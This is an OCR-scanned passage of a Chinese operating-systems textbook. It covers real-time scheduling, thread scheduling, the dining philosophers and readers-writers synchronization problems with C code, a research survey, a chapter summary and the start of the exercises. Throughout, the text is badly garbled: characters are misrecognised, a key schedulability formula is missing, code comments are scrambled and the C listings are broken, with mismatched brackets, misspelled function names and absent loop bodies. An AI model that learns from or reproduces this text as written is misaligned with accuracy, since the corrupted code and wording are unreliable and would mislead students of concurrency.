工厂 中 的 机 器 人 控制 等 。 在 所 有 这 些 例 子 中 ， 正 确 的 但 是 迟到 的 应 答 往 
往 比 没有 还 要 糟糕 。 








实时 系统 通常 可 以 分 为 硬 实时 Chard real time) 和 软 实时 (soft real 
time) ， 前 者 的 含义 是 必须 满足 绝对 的 截止 时 间 ， 后 者 的 含义 是 虽然 不 
希望 偶尔 错失 截止 时 间 ， 但 是 可 以 容忍 。 在 这 两 种 情形 中 ， 实 时 性 能 都 
是 通过 把 程序 划分 为 一 组 进程 而 实现 的 ， 其 中 每 个 进程 的 行为 是 可 预测 
和 提前 掌握 的 。 这 些 进程 一 般 寿 命 较 短 ， 并 且 极 快 地 就 运行 完成 。 在 检 
测 到 一 个 外 部 信号 时 ， 调 度 程序 的 任务 就 是 按照 满足 所 有 截止 时 间 的 要 
求 调度 进程 。 














实时 系统 中 的 事件 可 以 按照 啊 应 方式 进一步 分 类 为 周期 性 (以 规则 
的 时 间 间 隅 发 生 ) 事件 或 非 周 期 性 〈 发 生 时 间 不 可 预知 ) 事件 。 一 个 系 











统 可 能 要 响应 多 个 周期 性 事件 流 。 根 据 每 个 事件 需要 处 理 时 间 的 长 短 ， 
系统 甚至 有 可 能 无 法 处 理 完 所 有 的 事件 。 例 如 ， 如 果 有 m 个 周期 事件 ， 
事件 以 周期 P; 发 生 ， 并 需要 C 秒 CPU 时 间 处 理 一 个 事件 ， 那 么 可 以 处 
理 负载 的 条 件 是 








满足 这 个 条 件 的 实时 系统 称 为 是 可 调度 的 。 


作为 一 个 例子 ， 考 虑 一 个 有 三 个 周期 性 事件 的 软 实 时 系统 ， 其 周期 
分 别 是 100ms、200ms 和 500ms。 如 果 这 些 事件 分 别 需 要 50ms、30ms 和 
100 ms 的 CPU 时 间 ， 那 么 该 系统 是 可 调度 的 ， 因 为 0.5+0.15+0.2 坟 1。 如 
果 有 第 四 个 事件 加 入 ， 其 周期 为 1 秒 ， 那 么 只 要 这 个 事件 是 不 超过 每 事 
件 150ms 的 CPU 时 间 ， 那 么 该 系统 就 仍然 是 可 调度 的 。 在 这 个 计算 中 隐 
含 了 一 个 假设 ， 即 上 下 文 切换 的 开销 很 小 ， 可 以 忽略 不 计 。 











实时 系统 的 调度 算法 可 以 是 静态 或 动态 的 。 前 者 在 系统 开始 运行 之 
前 作出 调度 决策 ; 后 者 在 运行 过 程 中 进行 调度 决策 。 只 有 在 可 以 提前 笛 
握 所 完成 的 工作 以 及 必须 满足 的 截止 时 间 等 全 部 信息 时 ， 静 态 调度 才能 
工作 。 而 动态 调度 算法 不 需要 这 些 限制 。 这 里 我 们 只 涉及 一 些 特定 的 算 
法 ， 而 把 实时 多 媒体 系统 留 到 第 7 章 去 讨论 。 





2.4.5 ”策略 和 机 制 


到 目前 为 止 ， 我 们 隐 含 地 假设 系统 中 所 有 进程 分 属 不 同 的 用 户 ， 并 
且 ， 进 程 间 相 互 竞 争 CPU。 通 种 情况 下 确实 如 此 ， 但 有 时 也 有 这 样 的 情 
况 : 一 个 进程 有 许多 子 进程 并 在 其 控制 下 运行 。 例 如 ， 一 个 数据 库 管 理 
系统 可 能 有 许多 子 进程 ， 每 一 个 子 进程 可 能 处 理 不 同 的 请 求 ， 或 每 一 个 
子 进程 实现 不 同 的 功能 “如 请 求 分 析 ， 磁 盘 访 问 等 。 主 进程 完全 可 能 
掌握 哪 一 个 子 进程 最 重要 《或 最 紧迫 ) 而 哪 一 个 最 不 重要 。 但 是 ， 以 上 
讨论 的 调度 算法 中 没有 一 个 算法 从 用 户 进程 接收 有 关 的 调度 决策 信息 ， 
这 就 导致 了 调度 程序 很 少 能 够 做 出 最 优 的 选择 。 














解决 问题 的 方法 是 将 调度 机 制 (scheduling mechanism) 与 调度 策略 
(scheduling policy〉 分 离 〈 著 名 的 原则 ，Levin 等 人 ，1975〉 ， 也 就 是 
将 调度 算法 以 某 种 形式 参数 化 ， 而 参数 可 以 由 用 户 进 程 填 写 。 我 们 再 来 
看 一 下 数据 库 的 例子 。 假 设 内 核 使 用 优先 级 调度 算法 ， 但 提供 一 条 可 供 
进程 设置 (并 改变 ) 优先 级 的 系统 调用 。 这 样 ， 尽 管 父 进程 本 身 并 不 参 
与 调度 ， 但 它 可 以 控制 如 何 调度 子 进程 的 细节 。 在 这 里 ， 调 度 机 制 位 于 
内 核 ， 而 调度 策略 则 由 用 户 进程 决定 。 








2.4.6 ”线程 调度 





当知 干 进 程 都 有 多 个 线程 时 ， 就 存在 两 个 层次 的 并 行 : 进程 和 线 
程 。 在 这 样 的 系统 中 调度 处 理 有 本 质 差 别 ， 这 取决 于 所 文 持 的 是 用 户 级 
线程 还 是 内 核 级 线程 〈 或 两 者 都 文 持 ) 。 


首先 考虑 用 户 级 线程 。 由 于 内 核 并 不 知道 有 线程 存在 ， 所 以 内 核 还 
古 和 以 前 一 样 地 操作 ， 选 取 一 个 进程 ， 假 设 为 A， 并 给 予 A 以 时 间 片 控 
制 。A 中 的 线程 调度 程序 决定 哪个 线程 运行 ， 假 设 为 AL1。 由 于 多 道 线程 
并 不 存在 时 钟 中 断 ， 所 以 这 个 线程 可 以 按 其 意愿 任意 运行 多 长 时 间 。 如 
果 该 线程 用 完了 进程 的 全 部 时 间 片 ， 内 核 就 会 选择 号 一 个 进程 运行 。 


在 进程 A 终 于 又 一 次 运行 时 ， 线 程 Al 会 接着 运行 。 该 线程 会 继续 耗 
费 A 进 程 的 所 有 时 间 ， 直 到 它 完 成 工作 。 不 过 ， 该 线程 的 这 种 不 合群 的 
行为 不 会 影响 到 其 他 的 进程 。 其 他 进程 会 得 到 调度 程序 所 分 配 的 合适 份 
额 ， 不 会 考虑 进程 A 内 部 所 发 生 的 事 。 


现在 考虑 A 线 程 每 次 CPU 计算 的 工作 比较 少 的 情况 ， 例 如 ， 在 50ms 
的 时 间 片 中 有 5ms 的 计算 工作 。 于 是 ， 每 个 线程 运行 一 会 儿 ， 然 后 把 
CPU 区 回 给 线程 调度 程序 。 这 样 在 内 核 切换 到 进程 B 之 前 ， 就 会 有 序列 
A1，A2，A3，A1，A2，A3，A1，A2，A3，Al1。 这 种 情形 可 用 图 2- 





43a 表 示 。 


ae ory `H EI Herd se 
线程 运行 进程 A 进程 B 进程 A 进程 B 
的 顺序 


2. 运行 时 系统 选 
取 个 线 程 





1. 内 核 选取 一 个 进程 


1. 内 核 选取 一 个 线程 B 


可 能 : A1, A2, A3, A1, A2, A3 可 能 : A1, A2, A3, A1, A2, A3 
不 可 能 ; A1, B1, A2, B2, A3, B3 ,也 可 能 ， A1, B1, A2, B2, A3, B3 
a) b) 


图 2-43 引用 户 级 线程 的 可 能 调度 ， 有 50ms 时 间 片 的 进程 以 及 每 次 运 
行 5ms CPU 的 线程 ; b) 与 有 相同 特性 的 内 核 级 线程 的 可 能 调度 


实时 系统 使 用 的 调度 算法 可 以 是 上 面 介绍 的 算法 中 的 任意 一 种 。 从 
实用 考虑 ， 轮 转调 度 和 优先 级 调度 更 为 第 用 。 人 惟一 的 局 限 是 ， 缺 乏 一 个 
时 钟 将 运行 过 长 的 线程 加 以 中 断 。 


现在 考虑 使 用 内 核 级 线程 的 情形 。 内 核 选择 一 个 特定 的 线程 运行 。 
它 不 用 考虑 该 线程 属于 哪个 进程 ， 不 过 如 果 有 必要 的 话 ， 它 可 以 这 样 
做 。 对 被 选择 的 线程 赋予 一 个 时 间 片 ， 而 且 如 果 超 过 了 时 间 片 ， 就 会 强 
制 挂 起 该 线程 。 一 个 线程 在 50ms 的 时 间 片 内 ，5ms 之 后 被 阻塞 ， 在 30ms 
的 时 间 段 中 ， 线 程 的 顺序 会 是 A1，B1，A2，B2，A3，B3， 在 这 种 参数 
和 用 户 线程 状态 下 ， 有 些 情形 是 不 可 能 出 现 的 。 这 种 情形 部 分 通过 图 2- 
43b 刻 画 。 


用 户 级 线程 和 内 核 级 线程 之 间 的 差别 在 于 性 能 。 用 户 级 线程 的 线程 
切换 需要 少量 的 机 器 指令 ， 而 内 核 级 线程 需要 完整 的 上 下 文 切换 ， 修 改 
内 存 映像 ， 使 局 速 缓 存 失 效 ， 这 导致 了 辱 干 数量 级 的 延迟 。 男 一 方面 ， 
在 使 用 内 核 级 线程 时 ， 一 旦 线程 阻塞 在 1O 上 就 不 需要 像 在 用 户 级 线程 
中 那样 将 整个 进程 挂 起 。 








从 进程 A 的 一 个 线程 切换 到 进程 B 的 一 个 线程 ， 其 代价 高 于 运行 进 
程 A 的 第 2 个 线程 《因为 必须 修改 内 存 映像 ， 清 除 内 存 高 速 缓存 的 内 
容 ) ， 内 核对 此 是 了 解 的 ， 并 可 运用 这 些 信息 做 出 决定 。 例 如 ， 给 定 两 
个 在 其 他 方面 同等 重要 的 线程 ， 其 中 一 个 线程 与 刚好 阻塞 的 线程 属于 同 
一 个 进程 ， 而 发 一 个 线程 属于 其 他 的 进程 ， 那 么 应 该 倾向 前 者 。 





另 一 个 重要 因素 是 用 户 级 线程 可 以 使 用 专 为 应 用 程序 定制 的 线程 调 
度 程序 。 例 如 ， 考 虑 图 2-8 中 的 Web 服 务 器 。 假 设 一 个 工作 线程 刚刚 补 
阻塞 ， 而 分 派 线程 和 另外 两 个 工作 线程 是 就 绪 的 。 那 么 应 该 运行 哪 一 个 
WE? 由 于 运行 系统 了 解 所 有 线程 的 作用 ， 所 以 会 直接 选择 分 派 线程 接着 
运行 ， 这 样 分 派 线程 就 会 启动 另 一 个 工作 线程 运行 。 在 一 个 工作 线程 经 
常 阻 塞 在 磁盘 UVO 上 的 环境 中 ， 这 个 策略 将 并 行 度 最 大 化 。 而 在 内 核 级 
线程 中 ， 内 核 从 来 不 了 解 每 个 线程 的 作用 虽然 它们 被 赋予 了 不 同 的 优 
先 级 ) 。 不 过 ， 一 般 而 言 ， 应 用 定制 的 线程 调度 程序 能 够 比 内 核 更 好 地 
满足 应 用 的 需要 。 








2.5 经典 的 IPC 问 题 





操作 系统 文献 中 有 许多 广 为 讨 论 和 分 析 的 有 趣 问 题 ， 它 们 与 同步 方 
法 的 使 用 相关 。 以 下 几 节 我 们 将 讨论 其 中 两 个 最 著名 的 问题 。 


2.5.1 哲学 家 束 餐 问题 


1965 年 ，Dijkstra 提 出 并 解决 了 一 个 他 称 之 为 哲学 家 就 餐 的 同步 问 

。 从 那 时 起 ， 每 个 发 明 新 的 同步 原 语 的 人 都 希望 通过 解决 哲学 家 就 餐 
问题 来 展示 其 同步 原 语 的 精妙 之 处 。 这 个 问题 可 以 简单 地 描述 如 下 : 五 
个 哲学 家 半 坐 在 一 张 圆 时 周围 ， 每 个 哲学 家 面前 都 有 一 盘 通 心 粉 。 由 于 
通 心 粉 很 滑 ， 所 以 需要 两 把 又 子 才 能 夹 住 。 相 邻 两 个 盘子 之 间 放 有 一 把 
叉子 ， 餐 果 如 图 2-44 所 示 。 

















图 2-44 哲学 家 的 午餐 时 间 


哲学 家 的 生活 中 有 两 种 交 答 活动 时 段 : 即 吃饭 和 思考 (这 只 是 一 种 
抽象 ， 即 对 哲学 家 而 言 其 他 活动 都 无 关 紧 要 ) 。 当 一 个 哲学 家 觉得 饿 了 
时 ， 他 就 试图 分 两 次 去 取 其 左边 和 右边 的 又 子 ， 每 次 拿 一 把 ， 但 不 分 次 
序 。 如 果 成 功 地 得 到 了 两 把 又 子 ， 束 开始 吃饭 ， 吃 完 后 放下 叉子 继续 丰 
考 。 关 键 问 题 是 ， 能 为 每 一 个 折 学 家 写 一 段 描 述 其 行为 的 程 计 ， 且 决 不 
会 死 锁 吗 ? (要 求 拿 两 把 久子 是 人 为 规定 的 ， 我 们 也 可 以 将 意大利 面条 
换 成 中 国 沫 ， 用 米饭 代 蔡 通 心 粉 ， 用 秘 子 代 蔡 叉子 。) 





图 2-45 给 出 了 一 种 直观 的 解法 。 过 程 take_fork 将 一 直 等 到 所 指定 的 
叉子 可 用 ， 然 后 将 其 取 用 。 不 过 ， 这 种 显然 的 解法 是 错误 的 。 如 果 五 位 
哲学 家 同时 拿 起 左面 的 又 子 ， 就 没有 人 能 够 拿 到 他 们 右面 的 又 子 ， 于 是 
发 生死 锁 。 





#define N 5 上 # 哲学 家 的 数目 */ 


void philosopher(int i) is 哲学 家 编号 ， 从 0 到 4 */ 


while (TRUE) { 
think( ); BF AES */ 


take_fork(i); * SRAUNF */ 


take_fork((i+1) % N); * 拿 起 右边 又 子 ，% 是 模 运 算 */ 
eat( ); /* 进食 */ 

put_fork(i); /* 将 左 叉 放 回 昌 上 */ 
put_fork((i+1) % N); /* 将 右 叉 放 回 果 上 */ 





图 2-45 哲学 家 就 餐 问 题 的 一 种 错误 解法 


我 们 可 以 将 这 个 程序 修改 一 下 ， 这 样 在 拿 到 左 义 后 ， 程 序 要 但 看 右 
面 的 又 子 是 否 可 用 。 如 果 不 可 用 ， 则 该 哲学 家 先 放下 左 又 ， 等 一 段 时 
间 ， 再 重复 整个 过 程 。 但 这 种 解法 也 是 错误 的 ， 尽 管 与 前 一 种 原因 不 
同 。 可 能 在 某 一 个 瞬间 ， 所 有 的 哲学 家 都 同时 开始 这 个 算法 ， 拿 起 其 左 
又 ， 看 到 右 又 不 可 用 ， 又 都 放下 左 又 ， 等 一 会 儿 ， 又 同时 拿 起 左 又 ， 如 
此 这 样 永远 重复 下 去 。 对 于 这 种 情况 ， 所 有 的 程序 都 在 不 停 地 运行 ， 但 
都 无 法 取得 进展 ， 就 称 为 饥饿 〈starvation) 。“〈 即 使 问题 不 发 生 在 意 大 
利 餐 馆 或 中 国 餐 馆 ， 也 被 称 为 饥饿 。) 

















现在 读者 可 能 会 想 , “如 果 哲 学 家 在 拿 不 到 右边 又 子 时 等 待 一 段 随 
机 时 间 ， 而 不 是 等 竺 相同 的 时 间 ， 这 样 发 生 互 锁 的 可 能 性 就 很 小 了 ， 事 
情 就 可 以 继续 了 。” 这 种 想法 是 对 的 ， 而 且 在 几乎 所 有 的 应 用 程序 中 ， 
稍 后 再 试 的 办 法 并 不 会 演化 成 为 一 个 问题 。 例 如 ， 在 流行 的 局 域 网 以 太 
网 中 ， 如 果 两 台 计 算 机 同时 发 送 包 ， 那 么 每 台 计 算 机 等 竺 一段 随机 时 间 
之 后 再 尝试 。 在 实践 中 ， 该 方案 工作 民 好 。 但 是 ， 在 少数 的 应 用 中 ， 人 
们 希望 有 一 种 能 够 始终 工作 的 方案 ， 它 不 能 因为 一 串 不 可 靠 的 随机 数字 
而 导致 失败 〈 想 象 一 下 核电 站 中 的 安全 控制 系统 ) 。 





对 图 2-45 中 的 算法 可 做 如 下 改进 ， 它 既 不 会 发 生死 锁 又 不 会 产生 饥 
iR: 使 用 一 个 二 元 信号 量 对 调用 think 之 后 的 五 个 语句 进行 保护 。 在 开始 
拿 又 子 之 人 前， 哲学 家 先 对 互 斥 量 mutex 执 行 down 操 作 。 在 放 回 又 子 后 ， 
他 再 对 mutex 执 行 up 操 作 。 从 理论 上 讲 ， 这 种 解法 是 可 行 的 。 但 从 实际 
角度 来 看 ， 这 里 有 性 能 上 的 局 限 : 在 任何 一 时 刻 只 能 有 一 位 哲学 家 进 

。 而 五 把 又 子 实 际 上 可 以 允许 两 位 哲学 家 同时 进餐 














图 2-46 中 的 解法 不 仅 没 有 死 锁 ， 而 且 对 于 任意 位 哲学 家 的 情况 都 能 
获得 最 大 的 并 行 度 。 算 法 中 使 用 一 个 数组 state 跟 踪 每 一 个 哲学 家 是 在 进 
餐 、 思 考 还 是 饥饿 状态 〈 正 在 试图 拿 又 子 ) 。 一 个 哲学 家 只 有 在 两 个 邻 
居 都 没有 进餐 时 才 人 允许 进 入 到 进餐 状态 。 第 个 哲学 家 的 邻居 则 由 宏 
LEFT 和 RIGHT 定 义 ， 换 言 之， 车 i 为 2， 则 LEFT 为 1，RIGHT 为 3。 


#define N 5 

#define LEFT (i+N—1)%N 
#define RIGHT (i+1)%N 
#define THINKING 0 

#define HUNGRY 1 

#define EATING 2 

typedef int semaphore; 

int state[N]; 

semaphore mutex = 1; 
semaphore s[N]; 


void philosopher(int i) 
while (TRUE) { 
} 

} 


void take_forks(int i) 

{ 
down(&mutex); 
state[i] = HUNGRY; 
test(i); 
up(&mutex); 
down(&s[i]); 

} 


void put_forks(i) 
{ 


down(&mutex); 
state[i] = THINKING; 
test(LEFT); 
test(RIGHT); 
up(&mutex); 

} 


void test(i) 


if (state[i] == HUNGRY && state[LEFT] != EATING && state[RIGHT] != EATING) { 


state[i] = EATING; 
up(&s[i)); 


图 2-46 哲学 


该 程序 使 用 了 一 个 信号 量 数组 ， 





在 所 需 的 又 子 被 占用 时 ， 


想 进餐 的 哲 


* 哲学 家 数目 */ 

/*i 的 左 邻 居 编 号 */ 

/* ji WA 邻居 编号 */ 

[* 4 ar F 家 在 思考 #/ 

/* 哲学 家 试图 拿 起 叉子 4 

/# 哲学 家 进餐 */ 

/#* 信号 量 是 一 种 特殊 的 整 型 数据 */ 


虚数 组 用 来 跟 踊 记录 每 位 哲学 家 的 状态 */ 


/* 临 界 区 的 互 斥 */ 
/# 每 个 哲学 家 一 个 信号 量 */ 


Iti: 哲学 家 编号 ， 从 0 到 N- 1 */ 


/* 无 限 循环 */ 


is 哲学 家 编号 


/* BEAM FEE */ 

PART FRET URRE */ 
/* 尝试 获取 2 把 叉子 */ 

ie 离开 临界 区 */ 

1 如 果 得 不 到 需要 的 叉子 则 阻塞 */ 


， 从 0 到 N- 1 */ 


/#i: 哲学 家 编号 ， 从 0 到 N- 1 */ 


进入 临界 区 */ 
eee eRe 
/* 检查 左边 的 邻居 现在 可 以 吃 吗 */ 
/* 检查 右边 的 邻居 现在 可 以 吃 吗 */ 
/* 离开 临界 区 */ 


/#i:， 哲学 家 编号 ， 从 0 到 N- 1 */ 





家 就 餐 问 题 的 一 个 解法 


每 个 信号 量 对 应 一 





位 哲学 家 ， 这 样 
有 学 家 就 被 阻 瞪 。 注 意 ， 每 个 进程 将 


过 程 ee 运行 ， 而 其 他 过 程 take_forks、put_forks 和 test 
只 是 普通 的 过 程 ， 而 非 单 独 的 进程 。 





2.5.2 ”读者 -号 者 问题 





哲学 家 就 餐 问 题 对 于 互 斥 访问 有 限 资源 的 竞争 问题 〈 如 IO 设备 ) 
一 类 的 建 模 过 程 十 分 有 用 。 男 一 个 著名 的 问题 是 读者 - 写 者 问题 
《Courtois 等 人 ，1971) ， 它 为 数据 库 访问 建立 了 一 个 模型 。 例 如 ， 设 
想 一 个 飞机 订 票 系统 ， 其 中 有 许多 竞争 的 进程 试图 读 写 其 中 的 数据 。 多 

进程 同时 读数 据 库 是 可 以 接受 的 ， 但 如 果 一 个 进程 正在 更 新 ( 写 ) 数 
据 库 ， 则 所 有 的 其 他 进程 都 不 能 访问 该 数据 库 ， 即 使 读 操 作 也 不 行 。 这 
里 的 问题 是 如 何 对 读者 和 写 者 进行 编程 ? 图 2-47 给 出 了 一 种 解法 。 























typedef int semaphore; I 运用 你 的 想象 */ 

semaphore mutex = 1; /* 控制 对 rc 的 访问 */ 

semaphore db = 1; 1 控制 对 数据 库 的 访问 */ 

int rc = 0; /* 正 在 读 或 者 即将 读 的 进程 数目 */ 


void reader(void) 


while (TRUE) { /* 无 限 循环 */ 
down(&mutex); /* 获得 对 rc 的 互 斥 访问 权 */ 
rc=rc+ 1; /* MEMS TI -TA */ 
if (rc == 1) down(&db); /* 如 果 这 是 第 一 个 读者 
up(&mutex); / 兰 释放 对 rc 的 互 斥 访 问 */ 
read_data_base( ); /* Yj We) BR */ 
down(&mutex); /* 获取 对 rc 的 互 斥 访问 */ 
rc=rc-1; /* MERD TNE */ 
if (rc == 0) up(&db)， + 如 果 这 是 最 后 一 个 读者 …… 


up(&mutex); 必 释 放 对 rc 的 互 斥 访问 */ 
use_data_read(); /* 非 临 界 区 */ 


void writer(void) 
, 记 无 限 循环 */ 
wits (TRUE) 1 PIRI IRB #7 
think-up-data(); fs AREER #7 
FR ， MERRE */ 
wnte_cata_base(); 人 * 释 放 互 斥 访问 岂 
up(&db); 





图 2-47 读者 - 写 者 问题 的 一 种 解法 


在 该 解法 中 ， 第 一 个 读者 对 信号 量 db 执 行 down 操 作 。 随 后 的 读者 
只 是 递增 一 个 计数 器 rc。 当 读者 离开 时 ， 它 们 递减 这 个 计数 器 ， 而 最 后 
一 个 读者 则 对 信号 量 执行 bg， 这样 就 允许 一 个 被 阻塞 的 写 者 《如 果 存 在 
的 话 ) 可 以 访问 该 数据 库 。 





在 该 解法 中 ， 隐 含 着 一 个 需要 注解 的 条 件 。 假 设 一 个 读者 正 使 用 数 
据 库 ， 忆 一 个 读者 来 了 。 同 时 有 两 个 读者 并 不 存在 问题 ， 第 二 个 读者 被 
允许 进入 。 如 果 有 第 三 个 和 更 多 的 读者 来 了 也 同样 允许 。 





现在 ， 假 设 一 个 写 者 到 来 。 由 于 写 者 的 访问 是 排他 的 ， 不 能 允许 写 
者 进入 数据 库 ， 只 能 被 挂 起 。 只 要 还 有 一 个 读者 在 活动 ， 就 允许 后 续 的 
读者 进来 。 这 种 集 略 的 结果 是 ， 如 果 有 一 个 稳定 的 读者 流 存在 ， 那 么 这 
些 读者 将 在 到 达 后 被 允许 进入 。 而 写 者 束 始 终 被 挂 起 ， 直 到 没有 读者 为 
止 。 如 果 来 了 新 的 读者 ， 比 如 ， 每 2 秒 钟 一 个 ， 而 每 个 读者 花费 5 秒 钟 完 
成 其 工作 ， 那 么 写 者 残 永远 没有 机 会 了 。 





为 了 避免 这 种 情形 ， 可 以 稍微 改变 一 下 程序 的 写法 : 在 一 个 读者 到 
达 ， 且 一 个 写 者 在 等 待 时 ， 该 者 在 写 者 之 后 被 挂 起 ， 而 不 是 立即 允许 进 
入 。 用 这 种 方式 ， 在 一 个 写 者 到 达 时 如 果 有 正在 工作 的 读者 ， 那 么 该 写 
者 只 要 等 待 这 个 读者 完成 ， 而 不 必 等 候 其 后 面 到 来 的 读者 。 该 解决 方案 
的 缺点 是 ， 并 发 度 和 效率 较 低 。Courtois 等 人 给 出 了 一 个 写 者 优先 的 解 
法 。 详 细 和 内容 请 参阅 他 的 论文 。 





2.6 ”有 关 进 程 和 线程 的 研究 


在 第 1 章 里 ， 我 们 介绍 了 有 关 操 作 系 统 结构 的 当前 研究 工作 。 在 本 
章 和 下 一 章 里 ， 我 们 将 更 专注 于 有 关 进 程 的 研究 。 随 着 时 间 推 移 ， 一 些 
问题 会 比 其 他 问题 解决 得 更 好 。 多 数 研 究 倾向 于 从 事 新 的 课题 ， 而 不 是 
围绕 着 有 数 十 年 历史 的 题目 进行 研究 。 





作为 一 个 例子 ， 关 于 进程 概念 的 研究 已 经 获得 展 好 的 解决 方案 
FATA HY St ABE PERE A Be AS as FH RSS AY 
源 ， 如 地 址 空间 、 线 程 、 打 开 的 文件 、 保 护 许可 等 。 不 同 的 系统 聚集 资 
源 的 方式 略 有 差别 ， 但 是 差别 仅 在 于 工程 处 理 方面 。 基 本 思想 不 会 有 较 
大 的 争议， 且 有 关 进 程 的 课题 也 几乎 没有 新 的 研究 在 进行 


线程 是 比 进程 更 新 的 概念 ， 但 是 它们 同样 也 经 过 了 相当 多 的 考虑 。 
仍然 偶尔 会 出 现 关 于 线程 的 论文 ， 例 如 ， 关 于 在 多 处 理 器 上 的 线程 集群 
(Tam 等 人 ，2007) 或 是 一 个 进程 中 的 线程 数量 如 何 扩 展 到 100 
000 (Von Behren 等 人 ，2003) 。 








现在 ， 进 程 同 步 问 题 已 经 相当 成 熟 和 固定 ， 但 是 每 隔 一 段 时 间 还 是 
会 有 一 篇 论文 ， 例 如 关于 无 锁 并 发 处 理 的 问题 (Fraser 和 Harris，2007) 
或 是 实时 系统 中 的 无 阻塞 同步 问题 〈Hohmuth 和 Haertig，2001) 。 


调度 〈 单 处 理 器 和 多 处 理 器 ) 还 是 一 些 研究 者 感 兴趣 的 话题 。 一 些 


正在 研究 的 主题 包括 移动 设备 上 的 能 耗 节省 调度 (Yuan 和 Nahrstedt， 
2006) 、 超 线程 级 调度 (Bulpin 和 Pratt，2005) 、 当 CPU 空闲 时 该 做 什 
么 〈Eggert 和 Touch，2005) 以 及 虚拟 时 间 调 度 〈Nieh 等 人 ，2001) 。 但 
是 ， 很 少 有 实际 系统 的 设计 者 会 因为 缺乏 像样 的 线程 调度 算法 而 整 天 若 
恼 ， 所 以 这 似乎 是 一 个 由 研究 者 推动 而 不 是 需求 推动 的 研究 类 型 。 总 而 
言 之 ， 进 程 、 线 程 与 调度 不 像 它 们 曾经 那样 ， 是 研究 的 热点 。 这 些 研 究 
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为 了 隐蔽 中 断 的 影响 ， 操 作 系 统 提 供 了 一 个 由 并 行 运 行 的 顺序 进程 
组 成 的 概念 模型 。 进 程 可 以 动态 地 创建 和 终止 。 每 个 进程 都 有 目 己 的 地 
址 空间 。 


对 于 茶 些 应 用 而 言 ， 在 一 个 进程 中 使 用 多 个 控制 线程 是 有 区 的 。 这 
些 线程 被 独立 调度 ， 每 个 线程 有 目 己 的 堆栈 ， 但 是 在 一 个 进程 中 的 所 有 
线程 共享 一 个 公共 地 址 空间 。 线 程 可 以 在 用 户 空 间或 内 核 中 实现 。 








进程 之 间 通 过 进程 间 通 信 原 语 彼 此 通信 ， 如 信号 量 、 管 程 或 消 轧 。 
这 些 原 语 用 来 确保 同一 时 刻 不 会 有 两 个 进程 在 临界 区 中 ， 免 除了 出 现 混 
乱 的 情形 。 进 程 可 以 处 在 运行 、 可 运行 或 阻塞 状态 ， 并 且 在 该 进程 或 其 
他 进程 执行 茶 个 进程 间 通 信 穆 语 时 ， 可 以 改变 其 状态 。 线 程 间 通信 也 是 
类 似 的 。 








进程 间 通 信 穆 语 可 以 用 来 解决 诸如 生产 者 -消费 者 问题 、 哲 学 家 融 
餐 问 题 和 读者 - 写 者 问题 等 。 即 便 有 了 这 些 原 语 ， 也 要 仔细 设计 以 避免 
出 错 和 死 锁 。 


已 经 有 一 大 批 研究 出 来 的 调度 算法 。 某 些 算 法 主要 用 于 批 处 理 系统 
中 ， 如 最 短 作业 优先 调度 算法 。 其 他 算法 常用 在 批 处 理 系统 和 交互 式 系 
统 中 ， 它 们 包括 轮转 调度 、 优 先 级 调度 、 多 级 队列 、 保 证 调度 、 彩 守 调 





度 以 及 公平 分 享 调度 等 。 有 些 系统 将 调度 策略 和 调度 机 制 清晰 地 分 离 ， 
这 样 可 以 使 用 户 对 调度 算法 进行 控制 。 


习题 


1. 图 2-2 中 给 出 了 三 个 进程 状态 。 在 理论 上 ， 三 个 状态 可 以 有 六 种 转 
换 ， 每 个 状态 两 个 。 但 是 ， 图 中 只 给 出 了 四 种 转换 。 有 没有 可 能 发 生 其 
他 两 种 转换 中 的 一 个 或 两 个 ? 


2. 假 设 要 设计 一 种 先进 的 计算 机 体系 结构 ， 它 使 用 硬件 而 不 是 中 断 
来 完成 进程 切换 。CPU 需 要 哪些 信息 ? 请 描述 用 硬件 完成 进程 切换 的 工 
作 过 程 。 


3. 在 所 有 当代 计算 机 中 ， 至 少 有 部 分 中 断 处 理 程序 是 用 汇编 语言 编 
写 的 。 为 什么 ? 


4. 当 中 断 或 系统 调用 把 控制 转 给 操作 系统 时 ， 通 常 将 内 核 堆 栈 和 被 
中 断 进程 的 运行 堆栈 分 离 。 为 什么 ? 


5. 多 个 作业 能 够 并 行 运行 ， 比 它们 顺序 执行 完成 的 要 快 。 假 设 有 两 
个 作业 同时 开始 执行 ， 每 个 需要 10 分 钟 的 CPU 时 间 。 如 果 顺 序 执行 ， 那 
么 最 后 一 个 作业 需要 多 长 时 间 可 以 完成 ? 如 果 并 行 执行 义 需 要 多 长 时 


lal? 假设 IO 等 待 占 509%。 








6. 在 本 章 中 说 明 的 图 2-11a 的 模式 不 适合 用 于 使 用 内 存 高 速 缓存 的 文 
件 服务 器 。 为 什么 不 适合 ? 每 个 进程 可 以 有 上 自己 的 高 速 缓存 吗 ? 








7. 如 果 创 建 一 个 多 线程 进程 ， 寿 子 进程 得 到 全 部 父 进程 线程 的 副 
本 ， 会 出 现 问 题 。 假 如 原 有 线程 之 一 正在 等 待 键盘 输入 ， 现 在 则 成 为 两 
个 线程 在 等 待 键盘 输入 ， 每 个 进程 有 一 个 。 在 单线 程 进程 中 也 会 发 生 这 
种 问题 吗 ? 


8. 在 图 2-8 中 ， 给 出 了 一 个 多 线程 Web 服 务 器 。 如 果 读 取 文 件 的 惟一 
途径 是 正常 的 阻塞 read 系 统 调 用 ， 那 么 Web 服务 器 应 该 使 用 用 户 级 线程 
是 内 核 级 线程 ? 为 什么 ? 


9. 在 本 章 中 ， 我 们 介绍 了 多 线程 Web 服 务 器 ， 说 明 它 比 单线 程 服务 
医 和 有 限 状态 机 服务 器 更 好 的 原因 。 存 在 单线 程 服务 堪 更 好 一 些 的 情形 
吗 ? 请 给 出 一 个 例子 。 


10. 在 图 2-12 中 寄存 器 集合 按 每 个 线程 中 的 内 容 列 出 而 不 是 按 每 个 进 
程 中 的 内 容 列 出 。 为 什么 ? 毕竟 机 器 只 有 一 套 寄 存 髓 





11. 为 什么 线程 要 通过 调用 thread_yield 自 愿 放 弃 CPU? 毕竟 ， 由 于 没 
有 周期 性 的 时 钟 中 断 ， 线 程 可 以 不 交加 CPU。 





12. 线 程 可 以 被 时 钟 中 断 抢占 吗 ? 如 果 可 以 ， 什 么 情形 下 可 以 ? 如 
果 不 可 以 ， 为 什么 不 可 以 ? 


13. 在 本 习题 中 ， 要 求 对 使 用 单线 程 文件 服务 器 和 多 线程 文件 服务 
器 读 取 文 件 进行 比较 。 假 设 所 需要 的 数据 都 在 块 高 速 缓存 中 ， 花 费 15ms 





获得 工作 请 求 ， 分 派 工作 ， 并 处 理 其 余 必 要 工作 。 如 果 在 三 分 之 一 时 间 
